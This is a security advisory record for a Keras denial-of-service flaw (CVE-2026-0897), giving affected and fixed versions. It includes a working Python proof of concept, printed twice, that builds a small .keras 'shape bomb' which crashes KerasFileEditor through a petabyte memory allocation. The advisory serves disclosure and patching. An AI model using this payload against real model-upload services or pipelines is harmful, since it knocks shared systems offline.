GHSA-MGX6-5CF9-RR43
Vulnerability from github – Published: 2026-05-06 23:09 – Updated: 2026-05-06 23:09Summary
Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading,
Keras executes:
python
result[key] = value[()] # loads entire dataset into memory
value[()] instructs h5py to allocate RAM proportional to the dataset’s declared shape – in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.
Proof of Concept
// PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor
# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
hdf5_bytes = io.BytesIO()
# Create an HDF5 file with a huge declared dataset shape
with h5py.File(hdf5_bytes, "w") as f:
d = f.create_dataset(
"payload",
shape=(50_000_000, 50_000_000), # Extremely large shape → petabytes on load
dtype="float32",
compression="gzip",
compression_opts=9
)
# Write minimal data so the file stays very small
d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)
hdf5_bytes.seek(0)
# Build a valid .keras archive structure
with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
z.writestr("config.json", "{}")
z.writestr("metadata.json", "{}")
z.writestr("model.weights.h5", hdf5_bytes.getvalue())
# Generate the malicious model file
create_malicious_keras()
# Trigger the DoS vulnerability when Keras loads the malicious file
KerasFileEditor("bomb.keras")
Expected Result
numpy._core._exceptions._ArrayMemoryError:
Unable to allocate 8.88 PiB for an array with shape (50000000, 50000000)
This crash occurs before any actual model processing, confirming the Denial-of-Service impact.
Impact
This vulnerability allows an attacker to crash any system that loads a malicious .keras model file.
The attacker can:
- Cause immediate memory exhaustion (8+ PiB allocation attempts)
- Crash TensorFlow / Python interpreter
- Kill Jupyter kernels
- Break automated model-upload pipelines
- Crash MLOps servers that process user models
- Deny service to shared GPU/CPU environments
If a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a Remote Denial of Service vector. Additional PoC Evidence (Video Demonstration) Attached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.
PoC Video (Google Drive): PoC Video
Finding: Critical memory-exhaustion flaw triggered by crafted .keras model files Vector: Malicious metadata causing extreme tensor shape inflation Impact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process Attack Scenario: Remote DoS on ML model processing pipelines and cloud inference services
Demonstration: The PoC video shows the crash occurring on Google Colab. Loading the malicious model consumed all system RAM and repeatedly terminated the runtime. Severity is high enough that the compute quota dropped from 83 hours → 4 hours after only a few tests. With larger payloads, this would instantly exhaust resources in real production pipelines.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.12.0"
},
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.12.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.13.0"
},
{
"fixed": "3.13.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-0897"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T23:09:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nKeras\u2019s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100\u2013400 KB) because HDF5 with gzip compression stores minimal data. During model loading, \nKeras executes:\n`python\nresult[key] = value[()] # loads entire dataset into memory`\nvalue[()] instructs h5py to allocate RAM proportional to the dataset\u2019s declared shape \u2013 in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.\n### Proof of Concept\n```\n// PoC.py\nimport zipfile\nimport io\nimport h5py\nimport numpy as np\nfrom keras.saving import KerasFileEditor\n\n# Create a malicious .keras model containing a massive HDF5 shape bomb\ndef create_malicious_keras(path=\"bomb.keras\"):\n hdf5_bytes = io.BytesIO()\n\n # Create an HDF5 file with a huge declared dataset shape\n with h5py.File(hdf5_bytes, \"w\") as f:\n d = f.create_dataset(\n \"payload\",\n shape=(50_000_000, 50_000_000), # Extremely large shape \u2192 petabytes on load\n dtype=\"float32\",\n compression=\"gzip\",\n compression_opts=9\n )\n # Write minimal data so the file stays very small\n d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)\n\n hdf5_bytes.seek(0)\n\n # Build a valid .keras archive structure\n with zipfile.ZipFile(path, \"w\", zipfile.ZIP_DEFLATED) as z:\n z.writestr(\"config.json\", \"{}\")\n z.writestr(\"metadata.json\", \"{}\")\n z.writestr(\"model.weights.h5\", hdf5_bytes.getvalue())\n\n# Generate the malicious model file\ncreate_malicious_keras()\n\n# Trigger the DoS vulnerability when Keras loads the malicious file\nKerasFileEditor(\"bomb.keras\")\n```\n### Expected Result\n```\nnumpy._core._exceptions._ArrayMemoryError:\nUnable to allocate 8.88 PiB for an array with shape (50000000, 50000000)\n```\nThis crash occurs before any actual model processing, confirming the Denial-of-Service impact.\n### Impact\nThis vulnerability allows an attacker to crash any system that loads a malicious `.keras` model file.\n\nThe attacker can:\n\n- Cause immediate memory exhaustion (8+ PiB allocation attempts)\n- Crash TensorFlow / Python interpreter\n- Kill Jupyter kernels\n- Break automated model-upload pipelines\n- Crash MLOps servers that process user models\n- Deny service to shared GPU/CPU environments\n\nIf a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a Remote Denial of Service vector.\nAdditional PoC Evidence (Video Demonstration)\nAttached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.\n\nPoC Video (Google Drive):\n[PoC Video](https://drive.google.com/file/d/1XAj57epTBWpj93GwHprHvb14WS9wpl5m/view?usp=drivesdk)\n\nFinding: Critical memory-exhaustion flaw triggered by crafted .keras model files\nVector: Malicious metadata causing extreme tensor shape inflation\nImpact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process\nAttack Scenario: Remote DoS on ML model processing pipelines and cloud inference services\n\nDemonstration:\nThe PoC video shows the crash occurring on Google Colab.\nLoading the malicious model consumed all system RAM and repeatedly terminated the runtime.\nSeverity is high enough that the compute quota dropped from 83 hours \u2192 4 hours after only a few tests.\nWith larger payloads, this would instantly exhaust resources in real production pipelines.",
"id": "GHSA-mgx6-5cf9-rr43",
"modified": "2026-05-06T23:09:38Z",
"published": "2026-05-06T23:09:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-mgx6-5cf9-rr43"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0897"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21880"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/22081"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petabyte Allocation in KerasFileEditor)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.